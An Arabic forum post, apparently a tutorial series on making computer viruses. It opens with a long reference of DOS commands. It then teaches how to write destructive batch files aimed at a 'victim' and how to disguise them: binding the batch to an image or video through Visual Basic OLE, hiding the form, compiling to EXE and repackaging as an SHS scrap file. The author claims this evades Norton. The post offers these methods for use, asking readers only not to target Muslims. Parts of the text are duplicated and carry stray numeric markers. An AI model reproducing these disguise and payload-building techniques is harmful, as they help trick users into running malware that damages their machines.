)]°@°[(دورة شاملة حول الفايروسات من البداية الى الاحتراف)]°@ )[°
 

اليوم انا بهديكم بدورة كاملة لصناعة الفيروسات وتنقسم الي عدة اقسام وهي المهم فيها انها لكل مبتديء في عالم الفيروسات وانها مفيدة جدا للمحترفين فقد ترددت كثيرا ولكن لاني واثق فيكم واعلم الله اني بيء كل البراءة من كل من يستخدم هذا المرجع " فبحق وربي هو مرجع في الفيروسلت" في ايزاء اي مسلم او اي من لم يؤزية من البشر فمن اهاف هذا المجلد هو ان تعرف كيف تفكر الفيروسات ويكف صنعت واعدكم اني سوف اكملة بكل ما هو جديد وكفانا ان نكون تابعين لابد ان يكون لنا اسلوبنا الخاص في كل شيء ولابد ان يكون لنا بصمة تكتب لنا في هذا العالم لابد ان نضع ذكري يشهد العالم اننا كنا وبحق نفعل ولا يفعل بنا واننا لا نتلاقي فقط ولكن نفعل وبطريقتنا


لابد ان تقسم بالله العظيم الذي فطر السموات والارض انك اذا استخدمت هذة المعلومات لن تضر اي احد من المسلمين بها
اذا كان للرجال عزما فهذا العزوم منا تراخت واذا كان للناس حقا عدلا ففي اسلامنا تراحم
انا بريء منكم يا ذي الكهوم انا كن لله طوعا وانت علي غـــــــــير العادة سئوما ================================================== =
بسم الله الرحمن الرحيم

الفيروسات
الدرس الاول
من منا لا يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات!
من يصنع الفيروسات بغرض الاذي, فليس الا مستهتر غبي يستعمل العلم في اشياء مضرة, و من اخطر الفيروسات التي صنعت حتي الان هو فيروس شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب في الحادي و العشرين من عمره لا يهوي الا التدمير..
مقدمة عن الفيروسات:
تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما ما سنصنعه الان ليس فيروسات, بل برامج مدمرة تقوم بنفس عمل الفيروسات, و لا يستطيع النورتن كشفها..
أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب ان يتوافر لديك الذكاء, انظر الي الامثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها..
ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين
بس الدرس الاول دا هيكون عن كلام كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
اوامر الدوس
دي اوامر الدوس ودي استعن بشرح الاخ سوفا من منتدي القراصنة
كلمة (DOS) اختصار لـ Disk Operating System
* تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
-دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
-الملفات:
إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
-جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
.BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
.COM ملف برنامج ( COMMAND ).
.EXE ملف جاهز للتنفيذ ( EXECUTABLE ).
.DOC ملف نصوص أو وثائق ( ******** ).
.ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
.BAK ملف احتياطي ( BACKUP ).
.BAS ملف برنامج بيسك ( BASIC ).
.DBF ملف قاعدة بيانات ( DBASE FILE ).
.PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
.SYS ملف تكوين نظام ( SYSTEM ).
.C ملف مصدر مكتوب بلغة سي ( C ).
الرموز المستخدمة في تسمية الملفات:
1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
2-الأرقام من 0 إلي 9 .
3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، ‍‍‍‍‌! ).
‍‍
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
1- طول الاسم الأساسي للملف من 1-8 حروف.
2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة.
7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
-تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
-أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:
1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة.
2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
-ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
-الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
-يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
ومثال على ذلك:
SCHOOLCLASS
إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
* رموز محركات الأقراص في نظام التشغيل ( DOS ):
1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
أ-أسطوانة مرنة حجم 3.5 بوصة.
ب-أسطوانة مرنة حجم 5.25 بوصة.
-ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
3- ( CD-ROM ): ويرمز له بالرمز D أو E.
* طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :

* الملفات الأساسية لنظام التشغيل الـ ( DOS ):
يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر .
* الاختصارات :
يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).
(يتبع)

مشكووور أخووووي على الموووضوووع

* الأوامر:
تنقسم أوامر الـ DOS إلى قسمين:
1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS - TIME - DATE - MD - CD - RD - DIR - DEL
2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
- تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
1-أوامر النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2-أوامر الاسطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3-أوامر الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4-أوامر الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
PRINT
FIND
EDIT
SORT
MSAV
MORE
HELP
5-الأوامر الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6-أوامر خاصة ونادرة الاستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
* شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
-ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
-شروط كتابة التاريخ في نظام التشغيل DOS:
1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
2-لا يمكن استخدام التاريخ الهجري.
3-لا يمكن كتابة الأشهر بالحروف.
4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75a وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل.
ومن أهم استخدامات الأمر PROMPT التالي:
PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
PROMPT $Q تغيير شكل المحث C إلي علامة =
PROMPT $$ تغيير شكل المحث C إلي علامة $
PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض :
1-اسم الاسطوانة والرقم المسلسل لها.
2-اسم الفهرس الحالي والمسار الحالي له.
3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ).
5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص .
أهم صور استخدامات الأمر DIR:
DIR/P لعرض الملفات صفحة صفحة
DIR/W لعرض الملفات بعرض الشاشة
DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AH عرض الملفات المخفية فقط
DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
DIR/AS عرض ملفات النظام فقط
DIR/AD عرض جميع الفهارس فقط بدون الملفات
DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر.
9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
1-معرفة الفهرس الحالي
2-الانتقال بين الفهارس إما من:
-رئيسي إلي فرعي
-فرعي إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:
1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة.
11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
(يتبع)

-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Rename ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
-ملاحظات هامة:
1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.
17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
1-التحكم في حجم الكتابة وعرضها على الشاشة.
2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
-ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
1-اكتشاف مواصفات الحاسب من حيث:
( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية.
23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية.
ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
-ملاحظة هامة:
يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات الأسطوانة كما كانت .
28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
ملاحظات هامة:
1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة ؟.
2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
-ملاحظات هامة:
يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
1-فتح ملف سبق حفظه والتعديل فيه.
2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
-يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
-لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC.EXE.

(يتبع)

بسم الله الرحمن الرحيم
الفيروسات
الدرس الثاني


طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
الدرس الثاني
1-تعريف الملفات الدفاعية :
هي عبارة عن حزمة من اوامر نظام التشغيل DOS يمكننه من خلاله استخدام اكثر من امر دوسي في وقت واحد مما يسهل للمستخدم الاستخدام مثل استخدام اكثر من امر format,copy,cd ..... |393|
2-.طرق صناعة الملفات الدفاعية :
الطريقة الاولى :
-----------------
1.افتح -----> start واضغط على Run واكتب command واضغط على ENTAR
2.اكتب امر(copy con) ثم اسم الفيروس |564| و الامتداد bat ثم اضغط Enter
3.اكتب الكود
4.لحفظ طريقتان هما
1.اضغط على F6 ومن ثم Enter
2.اضغط على Ctrl + z و من ثم Enter
الطريقة الثانية :
-----------------
1.ابدأ -----> البرامج -----> البرامج الملحقة -----> المفكرة Notepad
2.اكتب الكود
3.احفظ الفيروس بامتداد bat و حدد الموقع

الطريقة الثالثة :
-----------------
1.ابدأ -----> البرامج -----> DOS
2.اكتب Edit
3.ادخل الكود |312|
4.قم بحفظ الملف بمتداد bat و حدد المسار الخاص به
3-ايعازات التشغيل :
الايعاز الوظيفة
Echo تمنع عمل الإيعاز ( تعرض سطر على الشاشة )
Nul نقل بدون السؤال نعم-لا
Call الدخول الى ملف
@ يمنع عرض السطر على الشاشة
Cls يمسح الشاشة
Puse يقول للضحية الضغط على اي زر
Start بعد هذا الامر ضع اسم اي برنامج ليتم تغيله عند تشغيل الفيروس
End يوضع في نهاية الفيروس و هو ينهي الفيروس بعد تنفيذ الاوامر
/n ايعاز لا
cd\ الدخول الى ملف
\cd الخروج من ملف
/y ايعاز نعم |364|
***ارجوا ان تكون واضحة و هي سهلة الاستخدام

4-طريقة تشفير الفيروس :
اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير الامتداد من bat الى exe فسوف اذكر السبب في الدرس الرابع في قسم اسئلة و حلول ...
يمكنك تغير امتداد الـ Batch عن طريق برنامج Microsoft Visual Basic في الاصداران الخامس و السادس :
1.افتح برنامج الفيجول بيسك
2.اختر الاداة OLD من قائمة الادوات سوف تظهر لك نافذة Insert Object اختر منها Create from File ثم
اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
3.اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
الذي تريده ثم اضغط OK
4.ادخل كود الفروم :
----------------------------------
Microsoft Visual Basic 5.0 :
LE1.DoVerb OLE2.DoVerb
----------------------------------
Microsoft Visual Basic 6.0 :
OLE1.DoVerb
OLE2.DoVerb
me.hide ' تـقوم باخفاء الفورم
----------------------------------
5.من قائمة File اختر Make Project1.exe سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته مثلا اكتب Virus |105| لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE
6.الان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف|104| من قبل الكثير من مستخدمي الانترنت والامتداد
هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
والطريقه هي كالتالي :
1.قم بتشغيل برنامج WordPad افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
الباتش+الصورة حاول تنسق النوافذ والان اضغط على البرنامج Virus بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا اضغط بالزر الايمن على
